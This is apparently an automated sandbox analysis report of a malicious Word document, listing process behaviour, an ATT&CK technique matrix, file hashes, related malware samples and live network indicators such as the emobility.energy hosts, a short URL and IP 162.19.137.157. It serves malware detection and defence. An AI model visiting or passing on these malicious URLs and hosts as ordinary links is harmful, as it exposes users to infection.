Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Exploitation for Client Execution
Boot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1647950 Sample: Untitled_20250325.docx.doc Startdate: 25/03/2025 Architecture: WINDOWS Score: 52 9 t.emobility.energy 2->9 11 host1.emobility.energy 2->11 15 Suricata IDS alerts for network traffic 2->15 17 Contains an external reference to another file 2->17 6 WINWORD.EXE 173 109 2->6         started        signatures3 process4 dnsIp5 13 host1.emobility.energy 162.19.137.157, 443, 49717, 49718 CENTURYLINK-US-LEGACY-QWESTUS United States 6->13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Untitled_20250325.docx.doc11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://t.emobility.energy/JpXyeF?&achiever0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
host1.emobility.energy
162.19.137.157
truefalse
    high
    s-0005.dual-s-msedge.net
    52.123.128.14
    truefalse
      high
      t.emobility.energy
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://t.emobility.energy/JpXyeF?&achievertrue
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        162.19.137.157
        host1.emobility.energyUnited States
        209CENTURYLINK-US-LEGACY-QWESTUSfalse
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1647950
        Start date and time:2025-03-25 12:46:23 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 49s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:14
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Untitled_20250325.docx.doc
        Detection:MAL
        Classification:mal52.evad.winDOC@2/1@1/1
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.109.20.38, 23.204.23.20, 13.89.179.14, 52.111.251.18, 52.111.251.17, 52.111.251.16, 52.111.251.19, 23.33.42.76, 23.33.42.72, 52.109.6.63, 52.123.128.14, 40.126.24.147, 52.149.20.212, 20.199.58.43, 150.171.27.10
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eus2-azsc-000.roaming.officeapps.live.com, arc.msn.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, prod1.naturallanguageeditorservice.osi
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        162.19.137.157PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
          BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
              BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                        CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                          CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-0005.dual-s-msedge.nethttps://1drv.ms/o/s!Aij0JRNQrbnneSfOXvmQkoge4b0?e=GSyDcyGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            FILLING SUMMON DOCUMENT.docxGet hashmaliciousHTMLPhisherBrowse
                            • 52.123.128.14
                            Legal_Notice_Presentation.pptxGet hashmaliciousHTMLPhisherBrowse
                            • 52.123.129.14
                            CMR%20ReF%2015200477813.docxGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            PO#45028.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            Nuevo comando_BR WJO-3-24-2025.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            New Order.docxGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            PO#45028.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            Nuevo comando_BR WJO-3-24-2025.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            host1.emobility.energyPURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CENTURYLINK-US-LEGACY-QWESTUSPURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            https://tinyurl.com/SA-RecyclingGet hashmaliciousUnknownBrowse
                            • 162.19.138.82
                            CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            a0e9f5d64349fb13191bc781f81f42e1750413b4e6897a671bc759e04597952a0be747830189873b.bin.exeGet hashmaliciousLummaC StealerBrowse
                            • 162.19.137.157
                            Qyk8RJnGN7.exeGet hashmaliciousLummaC StealerBrowse
                            • 162.19.137.157
                            h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                            • 162.19.137.157
                            m3gyyctL5A.exeGet hashmaliciousLummaC StealerBrowse
                            • 162.19.137.157
                            PO#45028.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Nuevo comando_BR WJO-3-24-2025.xlam.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            ysxekL7sOS.exeGet hashmaliciousLummaCBrowse
                            • 162.19.137.157
                            37f463bf4616ecd445d4a1937da06e19NITECH_42613SIVECORZ422FMILO202510161528.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.19.137.157
                            Request for Quotation-RFQ20250324.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 162.19.137.157
                            h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                            • 162.19.137.157
                            Niceevenbettergirllikeabuttersmoothkissforme.htaGet hashmaliciousRemcosBrowse
                            • 162.19.137.157
                            goodisthebestthingsbetterwaytotellhimbestfor.htaGet hashmaliciousRemcosBrowse
                            • 162.19.137.157
                            SAMWHA #AWB000033065_25-03-25_000177817890 .vbsGet hashmaliciousGuLoaderBrowse
                            • 162.19.137.157
                            dukas.jsGet hashmaliciousRemcosBrowse
                            • 162.19.137.157
                            newwelcomedrinkforentireteammemebers.htaGet hashmaliciousRemcosBrowse
                            • 162.19.137.157
                            Sars_Refund_Statue.jsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            awb_fedex_documents_delivery_25_03_2025_0000000000000_doc.batGet hashmaliciousGuLoaderBrowse
                            • 162.19.137.157
                            No context
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):4.767813297648116
                            Encrypted:false
                            SSDEEP:3:klt+lllOTh8f/kHyr6f+qIUrXt59dWkJ+kleYhRlU:7tOysY8IOqq+ARlU
                            MD5:808EDCBFBFF9395AD432F699894BACA5
                            SHA1:D2B9238950D509B2B325EC5C5DE9157462BE948A
                            SHA-256:DF909EF652A1D9785AED3C6835C4ABDD27FDB30A3B0954D716E8CDC7819F9574
                            SHA-512:B77315113E187B6B9C1D9CE0A1B78EC9519B57E435E938CC38891B0988ED23794FA4DECF1F4E01E83E7A938C96A769534637A014A1479553E03DA251E58D47C1
                            Malicious:false
                            Reputation:low
                            Preview:.user.................................................a.l.f.o.n.s...+v.....z.....N_...e.2.......P(C%..{.slN..p..\Xx38rk..G#{.........[..%u.}..j......t..=.i
                            File type:Microsoft Word 2007+
                            Entropy (8bit):7.9642952408861385
                            TrID:
                            • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                            • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                            • ZIP compressed archive (8000/1) 9.41%
                            File name:Untitled_20250325.docx.doc
                            File size:56'028 bytes
                            MD5:e00b2ef0073a6021cc012dcf5d5ad70c
                            SHA1:c3dd54e43063122bcb849736ce7fe26ea27344cc
                            SHA256:f7821649e3f5fdb5cccba8f154ef19d8c59f46ca980059cf20a1d79b2f541bad
                            SHA512:701026b070af6ec9a38fc0dd3ba6a0005938e9882c2d25a4b64c4726da669ff8fc1deb488c88a8c245b40bcefde79966b3c87118443e99e2f7e53f3a57ba4e1a
                            SSDEEP:768:gOkYQoBauvMybG2FVChvBC78itcNjhxIqSSooFEl1Yt9Nxk/EW7hwTP9VAnCA9EQ:gvTolVChJIcphxpS1ubyZS38xu2apxs
                            TLSH:EB43E06BDC514C0BEB0C07F9FB85391EB670F7A3125321235E103D6E8EAA5CD4626E69
                            File Content Preview:PK........RLyZ+..0............[Content_Types].xmlUT....x.g.x.g.x.g.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..
                            Icon Hash:35e1cc889a8a8599
                            Document Type:OpenXML
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:
                            Encrypted Document:False
                            Contains Word Document Stream:True
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:False
                            Code Page:-535
                            Title:
                            Subject:
                            Author:91974
                            Keywords:
                            Template:Normal.dotm
                            Last Saved By:91974
                            Revion Number:2
                            Total Edit Time:1
                            Last Printed:2020-10-16 02:53:17
                            Create Time:2025-03-21T06:52:00Z
                            Last Saved Time:2025-03-21T06:53:00Z
                            Number of Pages:1
                            Number of Words:0
                            Number of Characters:0
                            Thumbnail:'H.&" WMFC @l! EMF@"8X?F, EMF+@xxF\PEMF+"@@$@0@?!@@!"!"!"!"!"!'%&%(6(%Ld(((!??%6)%Ld((!??%M6)M%LdM(MM(!??%g6)g%Ldg(gg(!??%}6)}%Ld}(}}(!??%6)%Ld((!??%6)%Ld((!??%6)%Ld((!??%(6%Ld((!??%(6(%Ld(((!??%6%Ld!??%6%Ld!??'%Ld''!??%%6(%Ld''!??%6%Ld!??'%(&%6(%Ld'&!??%6%Ld!??'%(&%6(%Ld'&!??%'6'%Ld'''!??!bK!;$$==V(8X8h(h$$AA<C%'%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%('%%V0#$$%%(%""Rp[SOu#a#/#lu|0#aQlu%hhy`Qy/%hy%hy/y%hT yy{/yuyO/yyI/ y<I/-&Wa#/yu9y y%huy%hdv%'A>TT4GUUA&A4LP1TTReUUA&ARLP2TThzUUA&AgLh(}P3TTUUA&ALP4TTUUA&ALP5TTUUA&ALP6TTUUA&ALPATT^gUUA&A^LPB%%"!%'A>)Rp0wiSO_GB2312ua#/lu|0aQlu&hXy`Qpy/&h y&hy/ y&hD!yy{/ yuyO/ yx yI/ yl>I/-&W"a#/yu9 yy&huy&hdv%Rp Verdanayupy-&lu&&" WMFC @aQlu'hXy`Qpy/'h y'hy/ y'hD!yy{/ yuyO/ yx yI/ ydcaI/-&Wa#/yu9 yy'huy'hdv%RpTimes New Romanyupy-&lu+aQlu(hXy`Qpy/(h y(hy/ y(hD!yy{/ yuyO/ yx yI/ ycaI/-&Wa#/yu9 yy(huy(hdv%T,i{UUA&A,itL4 TEL: 0086-512-82558856 FAX: 0086-512-58268319Rp[SOyupya#/D!yluunaQlu)hXy`Qpy/)h y)hy/ y)hD!yy{/ yuyO/ yx yI/ yTeaI/-&Wa#/yu9 yy)huy)hdv%RpTimes New RomanyupyD!ylu)aQlugXy`Qpy/g ygy/ ygD!yy{/ yuyO/ yx yI/ ypI/-&Wa#/yu9 yyguygdv%%%%%%%%"!%)MT-#JUUA&A-#Ld_ln~v[8fgPlQS))))))))))))%%"!%)NgTReUUA&ARLxJIANGSU SOIPOI CO.,LTD%"!%)TLUUA&A,LL%%%%%%%%"!%)%%%%%%%%TTUUA&ALP'%Ld!??%%TTUUA&ALP %Ld!??%%TTUUA&ALP'%Ld!??%%TTUUA&ALP %Ld!??%%TTUUA&ALPUS%Ld!??%%TUUA&ALp / DELIVERY ORDER%Ld!??%%%%"!%)%"!%'%(&%6%Ld!??%6%Ld!??%~6%Ld~~!??%~6%Ld~~!??%(6(%Ld(((!??%6%Ld!??%6%Ld!??%(6%Ld((!??%(M6M%Ld(MM(M!??%(g6g%Ld(gg(g!??%(}6}%Ld(}}(}!??%(6%Ld((!??%(6%Ld((!??%(6%Ld((!??%%"!%))%"!%'%(&%6%Ld!??%6%Ld!??%("Q|P(x( F4(EMF+*@$??FEMF+@ &6WMFC@''',',',--((-@!(-)-@!(-MM)-@!(M-gg)-@!(g-}})-@!(}-)-@!(-)-@!(-)-@!(-(-@!(-((-@!(--@!--@!-@!'--(-@!'--@!--(-@!&--@!--(-@!&-''-@!',$#"! ---$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$----$$$---''??-'A>2412R22gh(}32425262A2^B-"System-'-'A>,)0??_GB2312- Verdana-Times New Roman-2i,t TEL: 0086-512-82558856 FAX: 0086-512-58268319??-Times New Roman--------'-,M)+2#-))))))))))))--'-,gN)(2RJIANGSU SOIPOI CO.,LTD-'-,)2,--------'-,)--------2-@!--2 -@!--2-@!--2 -@!--2-@!--!2 / DELIVERY ORDER-@!----'-,)-'-,---@!--@!-~-@!~-~-@!~-((-@!(--@!--@!-(-@!(-M(M-@!M(-g(g-@!g(-}(}-@!}(-(-@!(-(-@!(-(-@!(--'-,),)-'-,---@!--@!-'#A(
                            Creating Application:Microsoft Office Word
                            Security:0
                            Document Code Page:1252
                            Presentation Target Format:
                            Number of Lines:1
                            Number of Paragraphs:1
                            Number of Slides:0
                            Number of Pages with Notes:0
                            Number of Hidden Slides:0
                            Number of Sound/Video Clips:0
                            Thumbnail Scaling Desired:false
                            Company:Grizli777
                            Contains Dirty Links:false
                            Shared Document:false
                            Changed Hyperlinks:false
                            Application Version:12.0000
                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x3EPRINT
                            CLSID:
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Stream Size:36988
                            Entropy:3.2497681809626355
                            Base64 Encoded:False
